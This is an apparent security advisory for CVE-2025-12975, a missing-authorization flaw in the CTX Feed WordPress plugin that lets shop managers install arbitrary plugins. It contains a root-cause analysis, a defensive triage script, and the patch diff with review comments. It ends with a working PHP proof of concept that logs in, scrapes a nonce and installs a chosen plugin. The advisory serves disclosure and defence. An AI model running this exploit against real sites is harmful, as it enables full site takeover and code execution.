Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-12975: CTX Feed – WooCommerce Product Feed Manager <= 6.6.11 – Missing Authorization to Authenticated (Shop Manager+) Arbitrary Plugin Installation (webappick-product-feed-for-woocommerce)

Severity High (CVSS 7.2)
CWE 862
Vulnerable Version 6.6.11
Patched Version 6.6.12
Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12975:
This vulnerability is a missing authorization flaw in the CTX Feed WordPress plugin, allowing authenticated attackers with Shop Manager privileges or higher to install arbitrary plugins. The vulnerability resides in the plugin’s AJAX handler function for plugin installation, enabling privilege escalation and potential remote code execution.

Atomic Edge research identified the root cause as a missing capability check in the `woo_feed_plugin_installing()` function within `/includes/helper.php`. The vulnerable function, beginning at line 6223, performed only a nonce verification via `check_ajax_referer()` but lacked any user authorization validation. This allowed any authenticated user with access to the AJAX endpoint to trigger the plugin installation routine, regardless of their actual permissions. The function directly passed user-controlled input from `$_POST['data']` to the `woo_feed_install_and_activate_plugin()` function.

Exploitation requires an authenticated attacker with Shop Manager or higher privileges to send a crafted POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `woo_feed_plugin_installing`. The attacker must include a valid nonce from the `woo-feed-our-plugins-nonce` context and specify the target plugin slug in the `data` parameter. The plugin slug can reference any WordPress.org repository plugin or a malicious plugin, which the vulnerable function will download, install, and activate automatically.

The patch adds capability checks at two critical points. In `woo_feed_plugin_installing()` at line 6229, the patch inserts `if ( ! current_user_can( 'manage_options' ) )` to verify administrator privileges before processing. If the check fails, the function sends a JSON response whose `status` field is 401 and whose `result` is `Unauthorized`. A secondary check was also added to `woo_feed_install_and_activate_plugin()` at line 6275, providing defense in depth. These changes restrict plugin installation exclusively to users with the `manage_options` capability, effectively removing the Shop Manager role from the authorized user set.
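Added example, not code from Atomic Edge or the CTX Feed plugin: a small Python triage script that flags the CWE-862 shape described above, a handler that verifies a nonce and reads request input but never calls `current_user_can()`. The embedded PHP is constructed to mirror the pre- and post-patch handler; `woo_feed_plugin_installing_fixed` and `woo_feed_render_widget` are hypothetical names used only for the sample.

```python
import re

# Constructed sample PHP mirroring the pre-patch (vulnerable) and patched
# shapes of woo_feed_plugin_installing(); not the plugin's real source.
SAMPLE_PHP = r"""
function woo_feed_plugin_installing() {
    check_ajax_referer( 'woo-feed-our-plugins-nonce', 'nonce' );
    $plugin_slug = isset( $_POST['data'] ) ? sanitize_text_field( $_POST['data'] ) : '';
    wp_send_json( array( 'status' => 200, 'result' => woo_feed_install_and_activate_plugin( $plugin_slug ) ) );
}

function woo_feed_plugin_installing_fixed() {
    check_ajax_referer( 'woo-feed-our-plugins-nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json( array( 'status' => 401, 'result' => 'Unauthorized' ), 401 );
    }
    $plugin_slug = isset( $_POST['data'] ) ? sanitize_text_field( $_POST['data'] ) : '';
    wp_send_json( array( 'status' => 200, 'result' => woo_feed_install_and_activate_plugin( $plugin_slug ) ) );
}

function woo_feed_render_widget() {
    echo 'renders markup only, no request handling';
}
"""

FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
NONCE_RE = re.compile(r"\b(check_ajax_referer|wp_verify_nonce)\s*\(")
CAP_RE = re.compile(r"\b(current_user_can|is_super_admin)\s*\(")
INPUT_RE = re.compile(r"\$_(POST|GET|REQUEST)\b")

def function_bodies(src):
    """Yield (name, body) for each PHP function by matching its braces."""
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), src[m.end():i - 1]

def find_missing_authorization(src):
    """Names of functions that verify a nonce and read request input but never
    check a capability: a nonce proves intent, not permission (CWE-862)."""
    return [name for name, body in function_bodies(src)
            if NONCE_RE.search(body) and INPUT_RE.search(body)
            and not CAP_RE.search(body)]

if __name__ == "__main__":
    for name in find_missing_authorization(SAMPLE_PHP):
        print(f"missing authorization check in {name}()")
```

The regex heuristic is for triage only: a capability check that lives in a helper called from the handler, or one mentioned only in a comment, will produce a false negative or false positive that a manual review must settle.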

Successful exploitation grants attackers the ability to install and activate arbitrary WordPress plugins. This directly enables privilege escalation by installing plugins that provide administrative capabilities or backdoor access. The most severe impact is remote code execution, achieved by installing a malicious plugin containing PHP code or by leveraging the capabilities of legitimate plugins to execute system commands, modify files, or establish persistent access. Attackers could compromise the entire WordPress installation and underlying server.

Differential between vulnerable and patched code

Code Diff
--- a/webappick-product-feed-for-woocommerce/V5/Product/ProductAttributeFactory.php
+++ b/webappick-product-feed-for-woocommerce/V5/Product/ProductAttributeFactory.php
@@ -47,6 +47,7 @@
 				'title'                 => esc_html__( 'Product Title', 'woo-feed' ),
 				'parent_title'          => esc_html__( 'Parent Title', 'woo-feed' ),
 				'description'           => esc_html__( 'Product Description', 'woo-feed' ),
+				'parent_description'    => esc_html__( 'Parent Description', 'woo-feed' ),
 				'description_with_html' => esc_html__( 'Product Description (with HTML)', 'woo-feed' ),
 				'short_description'     => esc_html__( 'Product Short Description', 'woo-feed' ),
 				'primary_category'      => esc_html__( 'Parent Category', 'woo-feed' ),
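Review bot: Unrelated feature work is bundled into the security release here; registering the new 'parent_description' attribute has nothing to do with the authorization fix and makes the patch harder to review and to backport in isolation. Split it into its own commit.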
--- a/webappick-product-feed-for-woocommerce/V5/Product/ProductInfo.php
+++ b/webappick-product-feed-for-woocommerce/V5/Product/ProductInfo.php
@@ -183,6 +183,22 @@
 	}

 	/**
+	 * Get product parent description.
+	 *
+	 * @return string
+	 * @since 8.0.0
+	 */
+	public function parent_description() {
+		if ( $this->product->is_type( 'variation' ) && $this->parent_product ) {
+			$description = CommonHelper::clean_content( $this->parent_product->get_description() );
+		} else {
+			$description = $this->description();
+		}
+
+		return apply_filters( 'woo_feed_filter_product_parent_description', $description, $this->product, $this->config, $this->parent_product );
+	}
+
+	/**
 	 * Get product description with HTML.
 	 *
 	 * @return string
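Review bot: The `@since 8.0.0` tag on parent_description() does not match the version this patch ships as; the WOO_FEED_FREE_VERSION and plugin-header hunks bump to 6.6.12, so the tag should read `@since 6.6.12`. The docblock should also state the fallback behaviour visible in the else branch: for non-variation products, or a variation with no parent, the method returns the product's own description().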
--- a/webappick-product-feed-for-woocommerce/includes/classes/class-woo-feed-constants.php
+++ b/webappick-product-feed-for-woocommerce/includes/classes/class-woo-feed-constants.php
@@ -24,7 +24,7 @@
 				 * @since 3.1.6
 				 */

-				define( 'WOO_FEED_FREE_VERSION', '6.6.11' );
+				define( 'WOO_FEED_FREE_VERSION', '6.6.12' );

 			}

--- a/webappick-product-feed-for-woocommerce/includes/helper.php
+++ b/webappick-product-feed-for-woocommerce/includes/helper.php
@@ -6223,21 +6223,41 @@
 }

 if ( ! function_exists( 'woo_feed_plugin_installing' ) ) {
-    function woo_feed_plugin_installing() {
+    function woo_feed_plugin_installing()
+    {
         // Handle AJAX request here
         // For example, get data from request
-        check_ajax_referer( 'woo-feed-our-plugins-nonce', 'nonce' );
+        check_ajax_referer('woo-feed-our-plugins-nonce', 'nonce');
+
+        if ( ! current_user_can( 'manage_options' ) ) {
+            $response = array(
+                'status' => 401,
+                'result' => 'Unauthorized'
+            );
+            // Send JSON response
+            wp_send_json($response);
+
+            // Don't forget to exit
+            wp_die();
+        }

-        $plugin_slug = isset( $_POST['data'] ) ? sanitize_text_field( $_POST['data'] )  : '';
+        $plugin_slug = isset($_POST['data']) ? sanitize_text_field($_POST['data']) : '';

         $result = woo_feed_install_and_activate_plugin($plugin_slug);

         // Process data
         // Example response
-        $response = array(
-            'status' => 200,
-            'result' => $result
-        );
+        if ($result == 'failed') {
+            $response = array(
+                'status' => 403,
+                'result' => $result
+            );
+        } else {
+            $response = array(
+                'status' => 200,
+                'result' => $result
+            );
+        }

         // Send JSON response
         wp_send_json($response);
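Review bot: The unauthorized branch added after check_ajax_referer() puts 401 only in the JSON body; wp_send_json() without a status-code argument still answers with HTTP 200, so WAF rules, monitoring and API clients keyed on the HTTP status will not see the rejection. Pass the code as the second argument (`wp_send_json( $response, 401 );`) or use wp_send_json_error(); since the caller is authenticated and merely lacks permission, 403 is the conventional code and would match the 403 branch added further down for a 'failed' result. The `wp_die();` after wp_send_json() is unreachable because wp_send_json() already terminates the request, and the whitespace-only rewrite of the check_ajax_referer() and $plugin_slug lines adds noise to a security patch.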
@@ -6252,6 +6272,11 @@
 if ( ! function_exists( 'woo_feed_install_and_activate_plugin' ) ) {
     function woo_feed_install_and_activate_plugin($plugin_slug)
     {
+
+        if ( ! current_user_can( 'manage_options' ) ) {
+            return "failed";
+        }
+
         // Include necessary WordPress files
         require_once ABSPATH . 'wp-admin/includes/plugin.php';
         require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
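Review bot: Returning the bare string "failed" from the new capability check forces the caller into a loose `$result == 'failed'` comparison and makes a permission denial indistinguishable from a download or activation failure. Return a WP_Error (or false) and branch on is_wp_error() in woo_feed_plugin_installing(). The check itself is worthwhile as defense in depth for any other code path that reaches woo_feed_install_and_activate_plugin().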
--- a/webappick-product-feed-for-woocommerce/woo-feed.php
+++ b/webappick-product-feed-for-woocommerce/woo-feed.php
@@ -10,7 +10,7 @@
  * Plugin Name:       CTX Feed
  * Plugin URI:        https://webappick.com/
  * Description:       Easily generate woocommerce product feed for any marketing channel like Google Shopping(Merchant), Facebook Remarketing, Bing, eBay & more. Support 100+ Merchants.
- * Version:           6.6.11
+ * Version:           6.6.12
  * Author:            WebAppick
  * Author URI:        https://webappick.com/
  * License:           GPL v2

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12975 - CTX Feed – WooCommerce Product Feed Manager <= 6.6.11 - Missing Authorization to Authenticated (Shop Manager+) Arbitrary Plugin Installation

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'shop_manager';
$password = 'password123';
$plugin_slug = 'malicious-plugin'; // Slug of plugin to install from WordPress.org repository

// Step 1: Authenticate and obtain cookies
$login_url = str_replace('/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Visit plugin page to obtain nonce (required for AJAX request)
// The nonce is typically loaded on plugin admin pages
$plugin_admin_url = str_replace('/admin-ajax.php', '/admin.php?page=webappick-feed-settings', $target_url);
curl_setopt($ch, CURLOPT_URL, $plugin_admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from page (this is simplified - actual implementation needs DOM parsing)
// Nonce is typically in a script tag or data attribute with name 'woo-feed-our-plugins-nonce'
preg_match('/woo-feed-our-plugins-nonce[\'"]+([a-f0-9]+)/', $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die('Could not extract nonce. Attack may require visiting specific plugin page first.');
}

// Step 3: Exploit the vulnerability to install arbitrary plugin
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'woo_feed_plugin_installing',
    'nonce' => $nonce,
    'data' => $plugin_slug
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);

$response = curl_exec($ch);
curl_close($ch);

// Step 4: Analyze response
echo "Response: " . htmlspecialchars($response) . "\n";
$json = json_decode($response, true);
if ($json && $json['status'] == 200) {
    echo "SUCCESS: Plugin '$plugin_slug' installed and activated.\n";
} else {
    echo "FAILED: Plugin installation failed.\n";
}

?>
